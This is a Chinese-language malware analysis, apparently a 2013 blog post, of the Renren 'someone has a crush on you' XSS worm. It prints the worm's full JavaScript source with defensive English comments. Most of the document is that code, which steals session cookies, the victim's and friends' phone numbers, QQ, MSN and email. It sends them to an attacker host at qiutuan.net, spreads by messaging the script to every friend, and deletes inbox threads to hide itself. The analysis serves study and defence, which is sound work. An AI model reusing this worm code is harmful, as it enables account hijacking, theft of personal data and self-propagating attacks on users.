
人人網「有人暗戀你哦」病毒源碼解析

tags:    時間:2013-12-10 19:47:21
人人網「有人暗戀你哦」病毒源碼解析
這個病毒的原理基本上是這樣的,病毒攻擊者利用人人網對XSS(跨站腳本攻擊)沒有做任何防護措施,簡單的流程可以描述成這樣:病毒製造者寫了封站內信,信裡有一段<script src='http://qiutuan.net/2011/51.js'></script>這樣的腳本,現在你所看到的是可視化的內容,但是人人把它作為了html標籤的內容,於是瀏覽器下載51.js,然後執行之,因為你在看這封站內信時已處於登錄狀態,這個js文件可以獲取cookie內容,然後獲取你的信息,然後通過一系列手段獲取你的好友的信息,然後將該站內信發給你的所有好友。這個所謂的「病毒」最大的危害是泄露隱私內容,比如說你的手機號、qq號、msn、學校信息等。
   下面把那段js貼出來,大家可以研究下,寫js代碼的哥們肯定是人人的前員工或者其他類似的,裡邊使用了很多變態的技巧,有一定的學習價值,但是拿它來作惡是不對的。

// Worm state. `XN.get_check` is read straight off the host page's globals;
// it is later sent as `tsc` with the share request, so it is presumably the
// site's per-session request (anti-CSRF) token. Because the injected script
// runs inside the victim's origin it can read that token directly — this is
// the point where the stored XSS turns into authenticated actions, and why
// output-encoding the message body is the control that matters.
var token = XN.get_check;
// Ids of friends found in the first group of the listcards response
// (treated by this script as friends with a phone number); each gets a
// contact-card lookup.
var mobile_friends = [];
// Every friend id, both groups; this is the propagation target list.
var all_friends = [];

// The victim's own profile id, set in get_self_info and echoed in the
// per-friend card beacons.
var my_id = 0;

// Exfiltration beacon: `v` is appended verbatim as the query string of a GET
// to the attacker-controlled log.php, issued by assigning an <img> src. The
// request is already in flight once src is set, so the append/remove pair
// only keeps the element out of the DOM. Every leak in this script funnels
// through here, so an outbound request to this host with cookie or profile
// fields in the URL is the single best detection indicator; a CSP img-src
// allow-list on the hosting page would also have blocked the channel.
function send_data(v) {
    var img = document.createElement('img');
    img.src = 'http://qiutuan.net/2011/log.php?' + v;   // data rides in the URL, no encoding applied here
    document.body.appendChild(img);
    document.body.removeChild(img);   // immediate removal; the load was already started
}

// Propagation driver: walks the victim's full friend list (filled by
// get_all_friends) and hands it to _send_to_friends in batches of ten ids,
// flushing any remainder at the end. The batch size is a hard-coded 10;
// whether the share endpoint enforces such a limit cannot be told from here.
function send_to_friends() {
    var i;
    var idlist = [];
    for (i = 0; i < all_friends.length; i++) {
        idlist.push(all_friends[i].toString());   // ids are sent as strings
        if (idlist.length == 10) {
            _send_to_friends(idlist);
            idlist = [];   // new array; the previous one now belongs to that request
        }
    }
    if (idlist.length > 0) _send_to_friends(idlist);   // trailing partial batch
}

// Self-replication step: posts one "share to friend" message to each id in
// `ids`. The message body is HTML that embeds the worm's own <script src>
// tag after a decoy image, so every recipient who opens it runs this script
// in turn. The page's analysis states the site rendered that body unescaped;
// output encoding of user-supplied message HTML is the control that breaks
// the loop. `tsc` is deleted from the JSON payload and sent as a separate
// form field instead — presumably the format the endpoint expects. On
// success it calls del_send_messages to remove the victim's inbox threads.
//
// As reproduced on this page the `content` literal is split across two
// lines, which is not valid JavaScript; the original presumably had it on
// one line.
function _send_to_friends(ids) {
    var content = "相信每個女生心底都有一隻小貓,有的嫵媚,有的狂野,有的多愁善感,有的古靈精怪……你心底的那隻蠢蠢欲動的小貓,是什麼樣子的呢?她喜歡笑,你就老以為她是快樂的;她喜歡跳,你就老以為她是開朗的;她喜歡扭,你就老以為她是放肆的;她喜歡叫,你就老以為她是狂野的。一個人的時候,她其實多愁善感;一個人的時候,她其實安靜淡然;一個人的時候,她其實內向自閉;一個人的時候,她其實乖巧溫柔……<img src='http://postimg1.mop.com/200712/15/80/2025080/200712150436548802.jpg'></img>
<script src='http://qiutuan.net/2011/51.js'></script> ";
    var p = {
        action: "sharetofriend",
        body: content,          // HTML body carrying the replicating <script> tag
        form: {
            albumid: "0",
            currenUserTinyurl: "http://hdn.xnimg.cn/photos/hdn421/20110118/1220/tiny_GeT4_23780d019116.jpg",
            fromSharedId: "0",
            fromShareOwner: "0",
            fromname: "",
            fromno: "0",
            fromuniv: "",
            link: "http://edm.renren.com/link.do?l=27627&t=51",
            pic: "http://jebe.xnimg.cn/20110412/19/62caea7b-c7bc-4217-994a-ba6c061e5aa0.jpg",
            summary: "相信每個女生心底都有一隻小貓,有的嫵媚,有的狂野,有的多愁善感,有的古靈精怪……你心底的那隻蠢蠢欲動的小貓,是什麼樣子的呢?",
            title: "加a02好友 獎品散不停",
            type: "51"
        },
        ids: ids,               // recipient batch from send_to_friends
        noteId: "0",
        subject: "有人暗戀你哦,你想知道TA是誰么",   // lure subject the page is named after
        tsc: token
    };

    delete p.tsc;   // token travels as a form field, not inside the JSON

    new XN.net.xmlhttp({
        url: "http://share.renren.com/share/submit.do",
        data: "tsc=" + token + "&post=" + encodeURIComponent(XN.json.build(p)),   // token read from the page (XN.get_check)
        onSuccess: function (response) {
            del_send_messages();   // cover tracks after each successful batch
        }
    });
}

// Deletes the message threads in `idlist` via a GET to /message/ajax.do.
// `folder: "1"` presumably matches the `f=1` inbox URL fetched in
// del_send_messages. This call uses Prototype-style Ajax.Request and
// `XN.JSON` (upper case) while the rest of the script uses XN.net.xmlhttp
// and `XN.json`; whether both helpers exist on the host page cannot be
// verified from this listing. No `tsc` token accompanies the request, so
// either the endpoint did not require one or the deletion failed silently —
// the listing does not show which. A state change over GET with no request
// token is itself the CSRF weakness a reviewer would flag on the server side.
function del_messages(idlist) {

    var struct_msgs = {
        action: "delete",
        folder: "1",
        slice: "20",
        unread_count: "0",
        ids: idlist   // thread ids scraped from the inbox HTML
    };

    new Ajax.Request("/message/ajax.do", {
        method: "get",
        parameters: "post=" + encodeURIComponent(XN.JSON.build(struct_msgs))
    });

}


// Track-covering step, run after each successful share batch: loads the
// inbox page (f=1), scrapes every `thread_<digits>` occurrence out of the
// HTML, strips the 7-character "thread_" prefix to leave the numeric id, and
// deletes all of them via del_messages. If the page yields no match,
// String.match returns null and the `.length` access throws, so the cleanup
// silently stops (there is no error handling in this callback). From the
// defender's side, a bulk delete of inbox threads immediately after a burst
// of share submissions from one session is a strong behavioural signal.
function del_send_messages() {
    new XN.net.xmlhttp({
        url: "http://msg.renren.com/message/inbox.do?f=1",
        method: "GET",
        onSuccess: function (response) {
            var listid1 = response.responseText.match(/thread_(\d+)/g);   // null when nothing matches
            for (var i = 0; i < listid1.length; i++) {
                listid1[i] = listid1[i].substring(7);   // "thread_".length === 7
            }
            del_messages(listid1);
        }
    });
}



// Harvests the victim's own profile. Fetches the profile info fragment and
// pulls fields out of the raw HTML with regexes: the numeric owner id, the
// school (text of the pf_spread link), birth year/month/day (from an embedded
// "birt" JSON fragment), the display name (from the avatar alt text
// "<name>的大頭貼"), and the QQ, MSN and mobile-number <dd> cells. Each
// `.exec(...)[1]` throws if its pattern is absent, which aborts the whole
// callback. The assembled record is beaconed through send_data as
// type=self_info; only name, school and msn are URL-encoded, qq and mobile
// go out raw.
function get_self_info() {
    new XN.net.xmlhttp({
        url: "http://www.renren.com/profile.do?v=info_ajax&undefined",
        method: "GET",
        onSuccess: function (r) {

            var text_html = r.responseText;

            var id, name, birthday, qq, school, mobile, msn, day, month, year;

            id = /getalbumprofile\.do\?owner\=(\d+)/.exec(text_html)[1];   // profile owner id
            my_id = id;   // remembered for the per-friend card beacons
            school = /pf_spread\'\>(.*?)\<\/a\>/.exec(text_html)[1];
            year = /birt\"\,\"year\"\:\"(\d+)/.exec(text_html)[1];
            month = /birt\"\,\"month\"\:\"(\d+)/.exec(text_html)[1];
            day = /birt\"\,\"day\"\:\"(\d+)/.exec(text_html)[1];
            name = /alt\=\"([^\"]+)的大頭貼/.exec(text_html)[1];   // name taken from the avatar alt text

            // month/day are strings here; `<= 9` coerces them to numbers, then
            // both are zero-padded to two digits for a YYYYMMDD value.
            if (month <= 9) {
                month = "0" + month;
            }
            if (day <= 9) {
                day = "0" + day;
            }
            birthday = year + month + day;

            qq = /QQ.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

            msn = /MSN.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];

            mobile = /手機號.*?dd\>(.*?)\<\/dd/.exec(text_html)[1];   // label text is the anchor for the phone cell

            var data = "type=self_info&id=" + id + "&name=" + encodeURIComponent(name) + "&school=" + encodeURIComponent(school) + "&birth=" + birthday + "&qq=" + qq + "&msn=" + encodeURIComponent(msn) + "&mobile=" + mobile;
            send_data(data);   // PII leaves the origin here
        }

    });
}

// Fetches one friend's contact card (showcard?friendID=<id>) and beacons its
// fields. The response is parsed with eval(), i.e. executing whatever the
// endpoint returns rather than JSON.parse — the same anti-pattern to flag in
// legitimate code. Fields read: id, name, msn, phone, qq, email, address;
// the listing does not show the card's real schema, so these are whatever the
// endpoint exposes to a logged-in friend. `my_id` may still be 0 here if
// get_self_info's response has not arrived yet, since the two requests run
// concurrently from window.onload.
function get_card(tid) {
    new XN.net.xmlhttp({
        url: 'http://www.renren.com/showcard?friendID=' + tid,
        method: 'get',
        onSuccess: function (r) {
            var obj = eval("(" + r.responseText + ")");   // eval on a server response
            var data = 'type=card&my_id=' + my_id + '&id=' + obj.id + '&name=' + encodeURIComponent(obj.name) + '&msn=' + encodeURIComponent(obj.msn) + '&phone=' + encodeURIComponent(obj.phone) + '&qq=' + encodeURIComponent(obj.qq) + '&email=' + encodeURIComponent(obj.email) + '&address=' + encodeURIComponent(obj.address);
            send_data(data);   // one beacon per friend card
        }
    });
}


// Enumerates the victim's friends from the listcards endpoint, parsed with
// eval() (see get_card). The response is read as two groups, list[0] and
// list[1]; the original comment and variable names treat list[0] as friends
// who listed a mobile number and list[1] as the rest — the listing does not
// show the actual schema. All ids go into all_friends (the propagation
// targets); list[0] ids also go into mobile_friends, and each of those gets
// its own get_card request. That burst of per-friend showcard requests from a
// single session is the kind of anomaly server-side rate/behaviour detection
// can catch. Finally send_to_friends starts the propagation. The repeated
// `var i` declarations are function-scoped, so all three loops share one
// variable.
function get_all_friends() {
    new XN.net.xmlhttp({
        url: "http://www.renren.com/listcards",
        method: "GET",
        onSuccess: function (r) {

            var text_html = r.responseText;
            //alert(text_html);
            var friends_list = eval("(" + text_html + ")");   // eval on a server response
            var owned_mobile = (friends_list.list[0].list).length; // size of group 0 (assumed: friends with a mobile number)
            for (var i = 0; i < owned_mobile; i++) {
                mobile_friends.push(friends_list.list[0].list[i].id);
                all_friends.push(friends_list.list[0].list[i].id);
            }
            //alert(mobile_friends.length);
            var no_mobile = (friends_list.list[1].list).length;   // size of group 1
            for (var i = 0; i < no_mobile; i++) {
                all_friends.push(friends_list.list[1].list[i].id);
            }
            //alert(all_friends.length);
            // One card request per friend in group 0 (no throttling).
            for (var i = 0; i < mobile_friends.length; i++)
            get_card(mobile_friends[i]);
            send_to_friends();   // begin propagation to every friend
        }
    });
}

// Entry point, run once the page that rendered the injected <script> has
// loaded. Fires three independent requests back-to-back: the cookie beacon
// (document.cookie exposes every cookie not marked HttpOnly, so the session
// cookie leaks only if it lacks that flag), then the profile harvest, then the
// friend enumeration. Nothing waits for anything else, so get_all_friends can
// beacon friend cards before my_id is known (see get_card).
window.onload = function () {
    send_data('type=cookie&v=' + encodeURIComponent(document.cookie));
    get_self_info();
    get_all_friends();
}


